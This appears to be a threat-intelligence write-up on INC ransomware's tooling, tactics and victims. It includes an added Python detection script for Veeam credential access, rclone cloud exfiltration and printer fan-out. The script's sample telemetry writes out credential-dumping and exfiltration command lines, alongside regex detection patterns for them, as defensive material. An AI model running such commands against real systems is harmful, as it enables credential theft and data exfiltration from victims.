INC has matured from an emerging RaaS operation into one of 2026’s most active ransomware families, claiming more than 800 victims since 2023 and capitalizing on disruption among competitors to expand its affiliate base.
The group’s recent campaigns demonstrate both incremental tooling refinement and novel pressure tactics: double extortion of stolen data combined with automated network printing of ransom notes to ensure physical visibility of demands.
Technically, INC has modernized its toolset. Both the Windows and Linux/ESXi encryptors were rewritten in Rust, enabling cross-platform builds and complicating analysis through unfamiliar compiler artifacts and containerized build traces.
The Windows payloads are delivered as heavily obfuscated PE64 binaries that leverage VMProtect in some samples, while other builds expose clear import tables and native API usage.
Static and dynamic analysis shows the malware is operator-driven: it parses command-line arguments for granular control, spawns a threadpool sized proportional to CPU cores (cores × 4), and supports multiple encryption modes (fast, medium, slow) and partial encryption heuristics to accelerate impact while preserving host responsiveness to display ransom instructions.
INC’s asymmetric/symmetric hybrid cryptography uses Curve25519-derived keys and AES/Salsa constructions to protect per-file keys, with a consistent .INC extension and a distinctive footer signature appended to encrypted files.
On Linux/ESXi targets the binary implements X25519 ECDH to derive AES-CTR keys per file and includes ESXi-specific routines that enumerate VMs via vim-cmd, shut them down, and optionally skip specified VM IDs, actions designed to maximize payload reach across virtualized infrastructure.
Victims are distributed globally, but the group predominantly targets organizations in the United States; notable past victims include NHS Scotland, Xerox and the Texas State Bar, among others.
A report from the Acronis Threat Research Unit (TRU) examines the evolution of INC ransomware, its attack chain, victimology, tooling and recent tactics, techniques and procedures (TTPs).
INC Ransomware Uses Double Extortion
The group’s intrusion lifecycle follows mature, human-operated ransomware playbooks. Initial access vectors include spear-phishing, purchased valid credentials from IABs, and exploitation of public-facing vulnerabilities such as Citrix and Fortinet CVEs and recent SimpleHelp RMM flaws.
For discovery and lateral movement actors use native tooling, Angry IP Scanner, PsExec, RDP and commercial RMM solutions.

Recent incident telemetry shows an updated credential dumper tailored to Veeam backups: a modified Veeam-Get-Creds.ps1 variant that adds hardcoded SQL connection parameters and support for Veeam’s newer salted DPAPI credential encryption.
That enhancement indicates proactive adaptation to contemporary backup deployments and increases the odds of entirely disabling recovery capability before encryption.
Defense-evasion includes process termination (PsKill and custom process terminators that deploy vulnerable drivers), shadow copy deletion through DeviceIoControl calls, and targeted attempts to disable EDRs.
For command-and-control and hands-on-keyboard access operators use a mix of Cobalt Strike, AnyDesk, ScreenConnect and TeamViewer.
Exfiltration is staged with 7-Zip archives and rclone to cloud storage, an approach that eases data transfer to varied providers while helping bypass perimeter filters.
The ransomware sample is a 64-bit Linux Executable and Linkable Format (ELF64) binary compiled as a position-independent shared object (DYN) under GCC (3.X).

Beyond technical evolution, INC’s operational posture emphasizes psychological and contractual pressure. Operators run a dual-site infrastructure: a private negotiation portal for victims and a public leak site to publish stolen data.
In addition to changing desktop wallpapers and dropping .txt/.html ransom notes, the malware actively enumerates networked printers and issues print jobs containing ransom instructions, producing hard-copy extortion notices visible to employees and partners, a tangible lever to accelerate payment decisions.
Victimology centers on the United States (over 65% of listings) and skews toward legal services, manufacturing, technology, health care and construction sectors where data sensitivity and operational disruption increase payability.
INC’s codebase also proliferated after a 2024 source-code sale, spawning related families like Lynx and Sinobi and spreading techniques across the ransomware ecosystem.
Defenders should prioritize reducing external attack surface, patching exposed services, protecting backup credentials and monitoring for credential-dumping scripts, abnormal rclone activity, and unauthorized print jobs.
Rapid detection of Veeam credential access and hardening of backup server accounts remain critical to limiting the combined impact of encryption and double extortion.
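The three monitoring recommendations above (credential-dumping scripts against Veeam, abnormal rclone activity, unauthorized print-job fan-out) can be expressed as simple correlation rules. The following is an added illustration, not code from the Acronis report or from INC's tooling; the telemetry records are constructed, and the Veeam table name and rclone remote syntax used in the patterns are assumptions about what such commands look like.

```python
import re
from collections import defaultdict

# Constructed sample telemetry (not from the report): process-creation and print-job records.
EVENTS = [
    {"t": 100, "kind": "proc", "host": "FS01", "user": "svc_backup",
     "cmd": r"powershell.exe -ep bypass -f C:\Temp\Veeam-Get-Creds.ps1"},
    {"t": 130, "kind": "proc", "host": "FS01", "user": "svc_backup",
     "cmd": r'sqlcmd -S . -Q "SELECT user_name,password FROM VeeamBackup.dbo.Credentials"'},
    {"t": 400, "kind": "proc", "host": "FS01", "user": "svc_backup",
     "cmd": r"C:\Temp\rclone.exe copy D:\Shares\Finance mega:staging --transfers 16"},
    {"t": 410, "kind": "proc", "host": "WS07", "user": "jdoe",
     "cmd": r"C:\Program Files\7-Zip\7z.exe a report.zip Q3.xlsx"},
    {"t": 900, "kind": "print", "host": "FS01", "user": "svc_backup", "printer": "HR-LaserJet"},
    {"t": 903, "kind": "print", "host": "FS01", "user": "svc_backup", "printer": "Lobby-MFP"},
    {"t": 905, "kind": "print", "host": "FS01", "user": "svc_backup", "printer": "Legal-Printer"},
    {"t": 950, "kind": "print", "host": "WS07", "user": "jdoe", "printer": "Lobby-MFP"},
]

# rclone followed by a remote target such as "mega:path"; two or more characters before
# the colon so that Windows drive letters (D:\...) do not match. Assumed syntax.
RCLONE_REMOTE = re.compile(r"\brclone(\.exe)?\b.*\s[A-Za-z0-9_-]{2,}:\S*", re.I)
# Script name from the report plus the assumed Veeam credential table name.
VEEAM_CREDS = re.compile(r"Veeam-Get-Creds|VeeamBackup\.dbo\.Credentials", re.I)


def detect(events, print_window=60, printer_fanout=3):
    """Return (rule, host, user) tuples for records matching the three rules."""
    alerts = []
    jobs = defaultdict(list)
    for e in events:
        if e["kind"] == "proc":
            if VEEAM_CREDS.search(e["cmd"]):
                alerts.append(("veeam_cred_access", e["host"], e["user"]))
            if RCLONE_REMOTE.search(e["cmd"]):
                alerts.append(("rclone_cloud_exfil", e["host"], e["user"]))
        elif e["kind"] == "print":
            jobs[(e["host"], e["user"])].append(e)
    # One principal driving jobs to many distinct printers in a short window.
    for (host, user), js in jobs.items():
        js.sort(key=lambda j: j["t"])
        for i, j in enumerate(js):
            window = [k for k in js[i:] if k["t"] - j["t"] <= print_window]
            if len({k["printer"] for k in window}) >= printer_fanout:
                alerts.append(("printer_fanout", host, user))
                break
    return alerts


if __name__ == "__main__":
    for rule, host, user in detect(EVENTS):
        print(f"{rule}: {user}@{host}")
```

The 7-Zip record deliberately raises nothing on its own; archiving is too common to alert on and is better correlated with a subsequent rclone upload from the same host.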
Indicators of compromise (IOCs)
Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.
